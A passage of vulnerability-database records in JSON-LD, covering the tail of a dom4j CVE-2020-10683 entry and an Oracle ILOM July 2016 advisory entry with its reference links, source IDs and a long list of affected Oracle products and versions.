"https://access.redhat.com/security/cve/cve-2019-17566", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1945", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-2875", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-2934", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-2933", }, { trust: 0.1, url: "https://access.redhat.com/security/updates/classification/#moderate", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_process_automation_manager/7.9/", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions&product=rhpam&version=7.9.0", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:3461", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:3637", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-1719", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-10172", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:3585", }, { trust: 0.1, url: 
"https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions&product\\xeap-cd&version", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-11612", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10719", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1719", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-10705", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-10172", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-10705", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-11612", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-10719", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/jboss_enterprise_application_platform_continuous_delivery/20/", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-14371", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-14371", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:3463", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:3639", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:3464", }, ], sources: [ { db: "VULHUB", id: "VHN-163186", }, { db: "PACKETSTORM", id: "159544", }, { db: "PACKETSTORM", id: "159924", }, { db: "PACKETSTORM", id: "158884", }, { db: "PACKETSTORM", id: "159081", }, { db: "PACKETSTORM", id: "159015", }, { db: "PACKETSTORM", id: "158891", }, { db: "PACKETSTORM", id: "159080", }, { db: "PACKETSTORM", id: "158881", }, { db: "CNNVD", id: "CNNVD-202004-1133", }, { db: "NVD", id: "CVE-2020-10683", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-163186", }, { db: "PACKETSTORM", id: "159544", }, { db: "PACKETSTORM", id: "159924", }, { db: "PACKETSTORM", id: "158884", }, { db: "PACKETSTORM", id: "159081", }, { db: 
"PACKETSTORM", id: "159015", }, { db: "PACKETSTORM", id: "158891", }, { db: "PACKETSTORM", id: "159080", }, { db: "PACKETSTORM", id: "158881", }, { db: "CNNVD", id: "CNNVD-202004-1133", }, { db: "NVD", id: "CVE-2020-10683", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2020-05-01T00:00:00", db: "VULHUB", id: "VHN-163186", }, { date: "2020-10-14T16:51:24", db: "PACKETSTORM", id: "159544", }, { date: "2020-11-06T15:18:46", db: "PACKETSTORM", id: "159924", }, { date: "2020-08-17T17:34:41", db: "PACKETSTORM", id: "158884", }, { date: "2020-09-07T16:38:23", db: "PACKETSTORM", id: "159081", }, { date: "2020-08-31T16:22:15", db: "PACKETSTORM", id: "159015", }, { date: "2020-08-17T17:43:22", db: "PACKETSTORM", id: "158891", }, { date: "2020-09-07T16:37:51", db: "PACKETSTORM", id: "159080", }, { date: "2020-08-17T15:35:45", db: "PACKETSTORM", id: "158881", }, { date: "2020-04-15T00:00:00", db: "CNNVD", id: "CNNVD-202004-1133", }, { date: "2020-05-01T19:15:12.927000", db: "NVD", id: "CVE-2020-10683", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2022-07-25T00:00:00", db: "VULHUB", id: "VHN-163186", }, { date: "2023-07-04T00:00:00", db: "CNNVD", id: "CNNVD-202004-1133", }, { date: "2024-11-21T04:55:50.587000", db: "NVD", id: "CVE-2020-10683", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "remote", sources: [ { db: "PACKETSTORM", id: "159544", }, { db: "PACKETSTORM", id: "159924", }, { db: "PACKETSTORM", id: "158884", }, { db: "PACKETSTORM", id: "159081", }, { db: "PACKETSTORM", id: "159015", }, { db: "PACKETSTORM", id: "158891", }, { db: "PACKETSTORM", id: "159080", }, { db: 
"PACKETSTORM", id: "158881", }, { db: "CNNVD", id: "CNNVD-202004-1133", }, ], trust: 1.4, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "dom4j Code problem vulnerability", sources: [ { db: "CNNVD", id: "CNNVD-202004-1133", }, ], trust: 0.6, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "sql injection", sources: [ { db: "PACKETSTORM", id: "159924", }, { db: "PACKETSTORM", id: "158884", }, { db: "PACKETSTORM", id: "159081", }, { db: "PACKETSTORM", id: "159015", }, { db: "PACKETSTORM", id: "158891", }, { db: "PACKETSTORM", id: "159080", }, { db: "PACKETSTORM", id: "158881", }, ], trust: 0.7, }, }
var-201607-0653
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Infrastructure. A denial-of-service (DoS) attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle 
Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'Multiple' protocol. The 'Infrastructure' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0653", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", 
version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: 
"oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail 
store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail 
integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: 
"13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy 
automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, 
{ model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", 
